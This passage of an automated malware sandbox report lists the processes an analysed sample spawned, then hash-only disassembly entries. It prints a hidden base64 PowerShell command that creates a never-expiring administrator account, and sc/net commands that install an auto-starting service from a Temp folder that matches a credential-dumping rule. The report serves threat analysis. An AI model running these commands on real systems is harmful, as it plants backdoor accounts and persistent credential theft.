                                                                                    Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:27
                                                                                    Start time:05:30:15
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:28
                                                                                    Start time:05:30:57
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c sc query myRdpService
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:29
                                                                                    Start time:05:30:57
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:30
                                                                                    Start time:05:30:57
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:sc query myRdpService
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:31
                                                                                    Start time:05:30:57
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:32
                                                                                    Start time:05:30:58
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:33
                                                                                    Start time:05:30:58
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:sc stop "myRdpService"
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:34
                                                                                    Start time:05:30:59
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c sc query myRdpService
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:35
                                                                                    Start time:05:30:59
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:36
                                                                                    Start time:05:30:59
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:sc query myRdpService
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:37
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
                                                                                    Imagebase:0x7ff74ca60000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:38
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:39
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:sc delete "myRdpService"
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:40
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
                                                                                    Imagebase:0x7ff788e30000
                                                                                    File size:72'192 bytes
                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:41
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\net.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:net start "myRdpService"
                                                                                    Imagebase:0x7ff7ad350000
                                                                                    File size:59'904 bytes
                                                                                    MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:42
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\net1.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                    Imagebase:0x7ff6b5af0000
                                                                                    File size:183'808 bytes
                                                                                    MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:43
                                                                                    Start time:05:31:07
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\Temp\myRdpService.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Temp\myRdpService.exe cakoi10
                                                                                    Imagebase:0x7ff68b170000
                                                                                    File size:9'427'456 bytes
                                                                                    MD5 hash:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002B.00000002.8189432745.00007FF68B676000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:44
                                                                                    Start time:05:31:20
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                    Imagebase:0x7ff7a5ba0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:45
                                                                                    Start time:05:31:20
                                                                                    Start date:08/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff78a560000
                                                                                    File size:875'008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FF95A29F23A Relevance: .4, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a1be9a16d5feb919ee03d64663a1a3399f4d712481d5c33283ce694d1455cc5f
                                                                                      • Instruction ID: a8deeca641898c94a603b2fc2124841c2fd519c695eefa880c075184900843d7
                                                                                      • Opcode Fuzzy Hash: a1be9a16d5feb919ee03d64663a1a3399f4d712481d5c33283ce694d1455cc5f
                                                                                      • Instruction Fuzzy Hash: 4BD16230A1CA4D8FEBA8DF28C8467E977D1FF58700F14426ED80DC7295CB74A9818B85
                                                                                      Function 00007FF95A29FFEA Relevance: .4, Instructions: 381COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05ab24a1406d65c65744d3fef533a506ef2169d0bb57b67376c97b0c35bb9d2a
                                                                                      • Instruction ID: d1d9936b4c5e346864e4a505791b14b037d1e1109a0a5b3715af2c66f4fccd34
                                                                                      • Opcode Fuzzy Hash: 05ab24a1406d65c65744d3fef533a506ef2169d0bb57b67376c97b0c35bb9d2a
                                                                                      • Instruction Fuzzy Hash: DED16230A18A4D8FEBA8DF28C8567F977D1FF54300F14426ED80EC7695DEB4A9448B86
                                                                                      Function 00007FF95A9D065D Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7116497731.00007FF95A9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A9D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a9d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: KZ
                                                                                      • API String ID: 0-4120615651
                                                                                      • Opcode ID: 1fa967edcafd670bbdd46bb9c2e2932fb1b715242d7ed028e4c6500fda54b588
                                                                                      • Instruction ID: 2f56f567e8e492bed10a9f0d6d09f37e0a2ea5a49a597bdfac6f0597e799fc5b
                                                                                      • Opcode Fuzzy Hash: 1fa967edcafd670bbdd46bb9c2e2932fb1b715242d7ed028e4c6500fda54b588
                                                                                      • Instruction Fuzzy Hash: 3301A752D0DAE20FE761DB6D28693746FE0FF96210B8D01FAD08ACA1E3DC4969858355
                                                                                      Function 00007FF95A29FBFA Relevance: .3, Instructions: 257COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f63a133b6f5e7aeff7b293d5b886627c8478a38751eb871ae3188c5baea8fa56
                                                                                      • Instruction ID: 3dfbb5b7a48a81a0497a554f5bdfec80f348144931b2175845c0892aebe2f440
                                                                                      • Opcode Fuzzy Hash: f63a133b6f5e7aeff7b293d5b886627c8478a38751eb871ae3188c5baea8fa56
                                                                                      • Instruction Fuzzy Hash: 20917230A18A4D8FEBA8DF28D4557E937D1FF58300F14426EE84DC7291CE74A984CB86
                                                                                      Function 00007FF95A29B4FD Relevance: .2, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c59147280d36d699c2538be342437b81faee847083631b7d3561c2b0ed234b0
                                                                                      • Instruction ID: d59d54344de6960eedba92887b6dec1f8733f24ae8d182a4f3316fd440c05c8b
                                                                                      • Opcode Fuzzy Hash: 6c59147280d36d699c2538be342437b81faee847083631b7d3561c2b0ed234b0
                                                                                      • Instruction Fuzzy Hash: 5E31A03190DB888FDB19DB6898597E97FF0EF56310F0441AFD089C3193D664680ACB51
                                                                                      Function 00007FF95A29B658 Relevance: .1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13f8cfb612702c28b0e3fdb5088f4e03a1024df3ab9b9f007b7f115a2d449e3f
                                                                                      • Instruction ID: 0814ef8dc4c6d1f6ad78f2716118f4554705b1f5cb7ab2293d84675e60a22641
                                                                                      • Opcode Fuzzy Hash: 13f8cfb612702c28b0e3fdb5088f4e03a1024df3ab9b9f007b7f115a2d449e3f
                                                                                      • Instruction Fuzzy Hash: 2A31D53190C64C8FEB58EFACD88A7E97BE0EF66321F04016ED049C7192DA75A855CB51
                                                                                      Function 00007FF95A29F684 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 567ccb31907aaa5066e0cf23449f881756a148708560f13741a882ad0cc8306e
                                                                                      • Instruction ID: 5041d111ed08f04700387240a2bb41198fa9e320beb528b6d5670799ba57bea7
                                                                                      • Opcode Fuzzy Hash: 567ccb31907aaa5066e0cf23449f881756a148708560f13741a882ad0cc8306e
                                                                                      • Instruction Fuzzy Hash: 4731F53091864E8EFBB8EF1ACC0ABF932D1FF45719F440179D44EC60A2CAB97985DA15
                                                                                      Function 00007FF95A362818 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7104464133.00007FF95A360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a360000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6831daf5b36fbf5df01b970456b8939fb1e45f14c8684ce6627f1f644df3128a
                                                                                      • Instruction ID: 05f114c631af40b10625f2bd69214a11049de45e44236f2a194fe6909c9d9778
                                                                                      • Opcode Fuzzy Hash: 6831daf5b36fbf5df01b970456b8939fb1e45f14c8684ce6627f1f644df3128a
                                                                                      • Instruction Fuzzy Hash: A001D122F1EE1A0FE7ADE79C28643B851C2EF88255B5D00FAC54EC3596CDACFC000288
                                                                                      Function 00007FF95A2937B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0510c104ccc11f1422a3fc18f39dcac0d29ecbdfebd35d47e464fc56c510ba33
                                                                                      • Instruction ID: b811528eb285d81b9be9c0ad7a8bc03194e2de46562dea565d3e988985310b15
                                                                                      • Opcode Fuzzy Hash: 0510c104ccc11f1422a3fc18f39dcac0d29ecbdfebd35d47e464fc56c510ba33
                                                                                      • Instruction Fuzzy Hash: F801447111CB0D8FD744EF0CE451AA6B7E0FB95324F10056DE58AC3651DA36E882CB46
                                                                                      Function 00007FF95A3627FA Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7104464133.00007FF95A360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a360000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b822c973a6a78d99a98fd09a58146b3ce00a6270c1a92260b019b83048062615
                                                                                      • Instruction ID: 873c57d87865a6bf68890f1e50d5803dd25277ae4ec39d5de96666b4028dd800
                                                                                      • Opcode Fuzzy Hash: b822c973a6a78d99a98fd09a58146b3ce00a6270c1a92260b019b83048062615
                                                                                      • Instruction Fuzzy Hash: 37F0B423D4DA190FE2A9D7883C153B862C1EF94624B4E00F6CA0CC3586DD54BC100289
                                                                                      Function 00007FF95A29B4F8 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 527712b3f0e7099d9ef5a3c365c7fdefca863b5002ab19eb9b312823ab43055d
                                                                                      • Instruction ID: 02151dd0903233d04e073eb8cce89a7f83109c78d201e541c2257e28c7e30b06
                                                                                      • Opcode Fuzzy Hash: 527712b3f0e7099d9ef5a3c365c7fdefca863b5002ab19eb9b312823ab43055d
                                                                                      • Instruction Fuzzy Hash: 9CE0863441090C8F8B44EF18D4099E977E0FF28305B00025BF41DC3120DB70A554CBC2

                                                                                      Non-executed Functions

                                                                                      Function 00007FF95A295888 Relevance: 34.2, Strings: 27, Instructions: 492COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (\MZ$(iMZ$(jMZ$(kMZ$8\MZ$8iMZ$8jMZ$8kMZ$H\MZ$HiMZ$HjMZ$HkMZ$X\MZ$XiMZ$XjMZ$XkMZ$hiMZ$hjMZ$hkMZ$xiMZ$xjMZ$xkMZ$xlMZ$[MZ$hMZ$iMZ$jMZ
                                                                                      • API String ID: 0-428571339
                                                                                      • Opcode ID: 0d26c0c3793fbd235bc2d427ad679dab10c0b44cabb021b494c22e58f5b4787b
                                                                                      • Instruction ID: 5f6ac541462d3bef9034d6b21e26d041660e6556a4fea634c5e7690a92052b7e
                                                                                      • Opcode Fuzzy Hash: 0d26c0c3793fbd235bc2d427ad679dab10c0b44cabb021b494c22e58f5b4787b
                                                                                      • Instruction Fuzzy Hash: 03D19757F0E4C10FF3148B9D3C762298ED9BF95E2072C42FFD098861DF5988A94AD299
                                                                                      Function 00007FF95A2978B6 Relevance: 34.2, Strings: 27, Instructions: 408COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: )_Z$ *_Z$ 4_Z$ 5_Z$ 6_Z$ 7_Z$ 8_Z$@)_Z$@*_Z$@4_Z$@5_Z$@6_Z$@7_Z$@8_Z$`)_Z$`4_Z$`5_Z$`6_Z$`7_Z$`8_Z$)_Z$3_Z$4_Z$5_Z$6_Z$7_Z$8_Z
                                                                                      • API String ID: 0-1128788987
                                                                                      • Opcode ID: d28a8343ada61308a72beb7da13e689dd19ae8dd857799fc29390ac5d991ce20
                                                                                      • Instruction ID: d1a30a3ad730bd868cc70db5571924a08e3fe18ffb015fcdb249d38ffd288c0b
                                                                                      • Opcode Fuzzy Hash: d28a8343ada61308a72beb7da13e689dd19ae8dd857799fc29390ac5d991ce20
                                                                                      • Instruction Fuzzy Hash: B4B113D3E0F4C51FF2158B0D7C166294EC9FFD1E6471D02FBE088861CF686CAA4A9285
                                                                                      Function 00007FF95A2981B8 Relevance: 15.3, Strings: 12, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: &_Z$ '_Z$ (_Z$@&_Z$@'_Z$@(_Z$`&_Z$`'_Z$`(_Z$%_Z$&_Z$'_Z
                                                                                      • API String ID: 0-310207025
                                                                                      • Opcode ID: 52a1787e503d6b3a6d6b35c5b95f2b3e3236df44d00e4a0407881370673507d3
                                                                                      • Instruction ID: 2b2adf3aa4a4f03f4a1416bbfc2c138efe183f01fab7fb28b21def186cf3ed7b
                                                                                      • Opcode Fuzzy Hash: 52a1787e503d6b3a6d6b35c5b95f2b3e3236df44d00e4a0407881370673507d3
                                                                                      • Instruction Fuzzy Hash: C881E4D7E0E9C10FE7158B1D7C1262A5ED9BFE1E5035D45FBD0888A0CF596CAD0AE288
                                                                                      Function 00007FF95A2985C0 Relevance: 5.4, Strings: 4, Instructions: 429COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: _Z$@ _Z$I$` _Z
                                                                                      • API String ID: 0-1211514086
                                                                                      • Opcode ID: 73b2ba30c2467439ee79a47445210cd27e77aa68fd1091713f7ac099d0e1b0fc
                                                                                      • Instruction ID: feb06c07f2bbb712300934b134caeb4a6cf8a0ceaf2fe1902398e1216a133aee
                                                                                      • Opcode Fuzzy Hash: 73b2ba30c2467439ee79a47445210cd27e77aa68fd1091713f7ac099d0e1b0fc
                                                                                      • Instruction Fuzzy Hash: 79D10497E0E5C10FF7118B5D3C166396FD4BF82AA0B1C40FBC1888A0DFA55CA94AD35A
                                                                                      Function 00007FF95A297C0E Relevance: 5.1, Strings: 4, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.7102912712.00007FF95A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A290000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_7ff95a290000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
